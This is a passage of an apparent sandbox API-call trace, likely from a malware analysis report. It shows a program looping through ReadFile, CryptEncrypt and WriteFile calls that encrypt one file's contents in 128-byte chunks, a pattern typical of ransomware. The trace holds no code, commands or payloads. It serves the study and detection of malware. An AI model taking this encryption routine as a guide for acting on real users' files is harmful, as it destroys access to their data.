lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.824] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.824] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.825] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.825] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.826] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.826] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.827] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.827] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] ReadFile (in: hFile=0xd4, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.828] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.828] WriteFile (in: hFile=0xd8, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.829] ReadFile (in: hFile=0xd4, 